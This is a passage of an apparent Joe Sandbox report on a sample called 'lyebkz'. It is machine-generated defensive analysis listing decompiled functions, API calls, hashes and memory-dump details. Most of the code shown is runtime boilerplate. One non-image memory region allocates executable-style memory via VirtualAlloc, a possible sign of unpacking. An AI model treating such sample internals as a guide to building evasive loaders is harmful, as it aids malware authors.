                                    0x004014b8
                                    0x00000000
                                    0x004014bd
                                    0x00401491
                                    0x004014c7

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 72daac4b5da97f2691914d8714452c10dbfd00684c863d522e738d51f03955e6
                                    • Instruction ID: aaf7c480747edc3c0a74e0743e60803d74adfeced85cffa2bd67ea20d3cf1614
                                    • Opcode Fuzzy Hash: 72daac4b5da97f2691914d8714452c10dbfd00684c863d522e738d51f03955e6
                                    • Instruction Fuzzy Hash: 95012D7180121AEBCF11AF65D90599E3A61AF04754F00827BF418262F1D7798662EBD9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00240838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 002407DA: GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                    • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0024089D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID: AllocInfoNumaSystemVirtual
                                    • String ID:
                                    • API String ID: 449148690-0
                                    • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                    • Instruction ID: a2dcb66f865b1de42624bc9250ef64b74825ab2ec442d39018592a2dd3ca09da
                                    • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                    • Instruction Fuzzy Hash: D7F01870D64309BAEB187BF04D8B76D76789F00301F105565B740771C3DA7856A09EA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404878 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 360 404878-40489a HeapCreate 361 40489c-40489d 360->361 362 40489e-4048a7 360->362
                                    C-Code - Quality: 100%
                                    			E00404878(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x41b57c = _t6;
				if(_t6 != 0) {
					 *0x41bb90 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                    0x0040488d
                                    0x00404893
                                    0x0040489a
                                    0x004048a1
                                    0x004048a7
                                    0x0040489d
                                    0x0040489d
                                    0x0040489d

                                    APIs
                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040488D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID:
                                    • API String ID: 10892065-0
                                    • Opcode ID: bd09d98794248c151ee644d6daf3eeae49167deeb6942443ce3eb3b2cea50609
                                    • Instruction ID: 42f5640ae34b5f3cb810f440d997e4ed21698ec7e11e1547c3a435a1368e941a
                                    • Opcode Fuzzy Hash: bd09d98794248c151ee644d6daf3eeae49167deeb6942443ce3eb3b2cea50609
                                    • Instruction Fuzzy Hash: 6CD05E76A54348AADB00AFB16C097A23BDCD388395F04C436B90CC6590E774D9408A48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 363 401906-40191c call 401840
                                    C-Code - Quality: 25%
                                    			E00401906(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00401840(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                                    0x0040190b
                                    0x0040190d
                                    0x00401910
                                    0x00401913
                                    0x0040191c

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                    • Instruction ID: bf1c7a8430721a0bb51276bfd7adce4e1b45a8fca5353f9dc8fdb51a6bf523e7
                                    • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                    • Instruction Fuzzy Hash: EAC09B7744010C77CF113943EC02E463F1997C0764F058021FB1C191719977D6619589
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404292 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 366 404292-404294 call 404220 368 404299-40429a 366->368
                                    C-Code - Quality: 100%
                                    			E00404292() {
				void* _t1;

				_t1 = E00404220(0); // executed
				return _t1;
			}




                                    0x00404294
                                    0x0040429a

                                    APIs
                                    • __encode_pointer.LIBCMT ref: 00404294
                                      • Part of subcall function 00404220: TlsGetValue.KERNEL32 ref: 00404232
                                      • Part of subcall function 00404220: TlsGetValue.KERNEL32 ref: 00404249
                                      • Part of subcall function 00404220: RtlEncodePointer.NTDLL(00000000,?,00404299,00000000,00407B7F,0041B048,00000000,00000314,?,00403BDA,0041B048,Microsoft Visual C++ Runtime Library,00012010), ref: 00404287
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: Value$EncodePointer__encode_pointer
                                    • String ID:
                                    • API String ID: 2585649348-0
                                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                    • Instruction ID: e51521083c20e9093a46c304e4b1f9cbce000d26f75fc24797caae08af525ba2
                                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0024073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 24073a-240781 call 24005f call 240073 * 2 VirtualAlloc 433 240783-240786 426->433 434 240788-240790 426->434 433->434 435 2407d5-2407d9 434->435 436 240792-24079f 434->436 437 2407a2-2407a6 436->437 438 2407be-2407cf 437->438 439 2407a8-2407bc 437->439 438->435 439->437
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00240777
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984097182.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_240000_lyebkz.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                    • Instruction ID: 3b4288ff085a1ff28d00ca07eb53c5ad4003a470c6c7735394b11ded1c37d44a
                                    • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                    • Instruction Fuzzy Hash: 33110670D10219AFDB04EFA8CC89BAEFBB4EB04304F2084A5EA15B7291D2755A949F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0040CA52 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040CA52(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E0040795E(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0040795E(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0040795E(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0040795E(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0040795E(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0040795E(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0040795E(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E0040795E(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0040795E(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0040795E(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0040795E(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0040795E(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0040795E(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0040795E(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E0040795E(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0040795E(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0040795E(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0040795E(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0040795E(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0040795E(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0040795E(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0040795E(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0040795E(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0040795E(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0040795E(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0040795E(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E0040795E(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0040795E(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0040795E(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0040795E(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0040795E(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0040795E(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0040795E(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0040795E(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0040795E(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0040795E(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0040795E(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0040795E(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E0040795E(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0040795E(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E0040795E(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0040795E(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0040795E(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0040795E(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                                    0x0040ca5a
                                    0x0040ca5e
                                    0x0040ca62
                                    0x0040ca65
                                    0x0040ca6a
                                    0x0040ca71
                                    0x0040ca77
                                    0x0040ca89
                                    0x0040ca9e
                                    0x0040cab3
                                    0x0040cac8
                                    0x0040cae0
                                    0x0040caf5
                                    0x0040cb07
                                    0x0040cb1c
                                    0x0040cb34
                                    0x0040cb49
                                    0x0040cb5e
                                    0x0040cb73
                                    0x0040cb8b
                                    0x0040cba0
                                    0x0040cbb5
                                    0x0040cbca
                                    0x0040cbe2
                                    0x0040cbf7
                                    0x0040cc0c
                                    0x0040cc21
                                    0x0040cc39
                                    0x0040cc4e
                                    0x0040cc63
                                    0x0040cc78
                                    0x0040cc90
                                    0x0040cca5
                                    0x0040ccba
                                    0x0040cccf
                                    0x0040cce7
                                    0x0040ccfc
                                    0x0040cd11
                                    0x0040cd26
                                    0x0040cd41
                                    0x0040cd59
                                    0x0040cd71
                                    0x0040cd89
                                    0x0040cda4
                                    0x0040cdbc
                                    0x0040cdd4
                                    0x0040cdec
                                    0x0040ce07
                                    0x0040ce1f
                                    0x0040ce3a
                                    0x0040ce4d
                                    0x0040ce57
                                    0x0040ce64
                                    0x0040ce6c
                                    0x0040ca6c
                                    0x0040ca70
                                    0x0040ca70

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ___getlocaleinfo
                                    • String ID:
                                    • API String ID: 1937885557-0
                                    • Opcode ID: df83f5cbc0c2568013c9cde3db90a7f3178389e87185a7618d13e237932d8ef8
                                    • Instruction ID: 6decb5dc1b7562a1e2c2f8f5ccb4f43cf894cd89b5e05df6b6192c689e5096b0
                                    • Opcode Fuzzy Hash: df83f5cbc0c2568013c9cde3db90a7f3178389e87185a7618d13e237932d8ef8
                                    • Instruction Fuzzy Hash: A5E1CEB2D0021EBEFB11DAE1CC41DFF7BBDEB04748F14052AB255E6081EA76AB059764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004057A2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E004057A2(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x41a550; // 0xdbec4c0
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x41b870 = _t6;
				 *0x41b86c = _t22;
				 *0x41b868 = _t25;
				 *0x41b864 = _t21;
				 *0x41b860 = _t27;
				 *0x41b85c = _t26;
				 *0x41b888 = ss;
				 *0x41b87c = cs;
				 *0x41b858 = ds;
				 *0x41b854 = es;
				 *0x41b850 = fs;
				 *0x41b84c = gs;
				asm("pushfd");
				_pop( *0x41b880);
				 *0x41b874 =  *_t31;
				 *0x41b878 = _v0;
				 *0x41b884 =  &_a4;
				 *0x41b7c0 = 0x10001;
				_t11 =  *0x41b878; // 0x0
				 *0x41b774 = _t11;
				 *0x41b768 = 0xc0000409;
				 *0x41b76c = 1;
				_t12 =  *0x41a550; // 0xdbec4c0
				_v812 = _t12;
				_t13 =  *0x41a554; // 0xf2413b3f
				_v808 = _t13;
				 *0x41b7b8 = IsDebuggerPresent();
				_push(1);
				E0040579A(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x416b5c);
				if( *0x41b7b8 == 0) {
					_push(1);
					E0040579A(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                    0x004057a2
                                    0x004057a2
                                    0x004057a2
                                    0x004057a2
                                    0x004057a2
                                    0x004057a2
                                    0x004057a2
                                    0x004057a8
                                    0x004057aa
                                    0x004057aa
                                    0x0040b091
                                    0x0040b096
                                    0x0040b09c
                                    0x0040b0a2
                                    0x0040b0a8
                                    0x0040b0ae
                                    0x0040b0b4
                                    0x0040b0bb
                                    0x0040b0c2
                                    0x0040b0c9
                                    0x0040b0d0
                                    0x0040b0d7
                                    0x0040b0de
                                    0x0040b0df
                                    0x0040b0e8
                                    0x0040b0f0
                                    0x0040b0f8
                                    0x0040b103
                                    0x0040b10d
                                    0x0040b112
                                    0x0040b117
                                    0x0040b121
                                    0x0040b12b
                                    0x0040b130
                                    0x0040b136
                                    0x0040b13b
                                    0x0040b147
                                    0x0040b14c
                                    0x0040b14e
                                    0x0040b156
                                    0x0040b161
                                    0x0040b16e
                                    0x0040b170
                                    0x0040b172
                                    0x0040b177
                                    0x0040b18b

                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0040B141
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0040B156
                                    • UnhandledExceptionFilter.KERNEL32(00416B5C), ref: 0040B161
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B17D
                                    • TerminateProcess.KERNEL32(00000000), ref: 0040B184
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 3633aa63159a632e74e18b65864914ea7cfb0a5544dce2e05c5538f6a6785dc5
                                    • Instruction ID: 32771f7f96bb7b7bf873eb73c4c426cadf354aa33007745641256fc70dd3a815
                                    • Opcode Fuzzy Hash: 3633aa63159a632e74e18b65864914ea7cfb0a5544dce2e05c5538f6a6785dc5
                                    • Instruction Fuzzy Hash: 4E21AFB4911208EFD741EF2AE9856843BE8FB48B14F11C53AE808972B1E7749985CF9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F127 Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 42%
                                    			E0040F127(void* __esi, void* __eflags) {
				void* _t7;
				int _t11;

				_t7 = E00407E10();
				asm("sbb eax, eax");
				 *((intOrPtr*)(__esi + 0x14)) =  ~(_t7 - 3) + 1;
				_t11 = EnumSystemLocalesA(E0040ED85, 1);
				if(( *(__esi + 8) & 0x00000004) == 0) {
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t11;
				}
				return _t11;
			}





                                    0x0040f127
                                    0x0040f132
                                    0x0040f13c
                                    0x0040f13f
                                    0x0040f149
                                    0x0040f14b
                                    0x00000000
                                    0x0040f14b
                                    0x0040f14f

                                    APIs
                                    • _strlen.LIBCMT ref: 0040F127
                                    • EnumSystemLocalesA.KERNEL32(Function_0000ED85,00000001), ref: 0040F13F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: EnumLocalesSystem_strlen
                                    • String ID:
                                    • API String ID: 216762292-0
                                    • Opcode ID: 481a6bbd0e845482002a6bc79966f6f9ed2a29ca67c7457a0b52adb901503beb
                                    • Instruction ID: 8b2f520920a657c3cf3fca0ceccdb2171c5b9655b1dfa72ccebc214e44c7e414
                                    • Opcode Fuzzy Hash: 481a6bbd0e845482002a6bc79966f6f9ed2a29ca67c7457a0b52adb901503beb
                                    • Instruction Fuzzy Hash: 86D0A770A513064AE7208F35D6093217BD0DB00B05F508D3DD942884C0C678A4448104
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C824 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040C824(int _a4, int _a8, short* _a12, int _a16) {

				return GetLocaleInfoW(_a4, _a8, _a12, _a16);
			}



                                    0x0040c83c

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0040C835
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: a4119b33cbdcfc62af1f6d206e44efae2756c9ce58d1964b79be306d0ebdde58
                                    • Instruction ID: 0652b55f9c5373a4e394ca821dcc4bd5fea6641fe49445d7f8183498143d10ac
                                    • Opcode Fuzzy Hash: a4119b33cbdcfc62af1f6d206e44efae2756c9ce58d1964b79be306d0ebdde58
                                    • Instruction Fuzzy Hash: 5CC0023200014DBB8F125F81EC048DA3F2AEB88261B058410FA1C05021C732D971EB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403689 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00403689() {

				SetUnhandledExceptionFilter(E00403647);
				return 0;
			}



                                    0x0040368e
                                    0x00403696

                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0040368E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b41e4a51fbf3383be120ed909939212314a7feb52b207dd880190d242feb9675
                                    • Instruction ID: 198de479c00b0858bc337882064e85648431d59cb65b5a55eb8c8ac0d358ec01
                                    • Opcode Fuzzy Hash: b41e4a51fbf3383be120ed909939212314a7feb52b207dd880190d242feb9675
                                    • Instruction Fuzzy Hash: 549002606921006696101B705D0B74529985B58E0375248716011D4196DB6681005D2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004043C4 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E004043C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x417ea0);
				E00402914(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00403697(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4168c0;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x41a898;
				E004059E4(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00404499();
				E004059E4(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
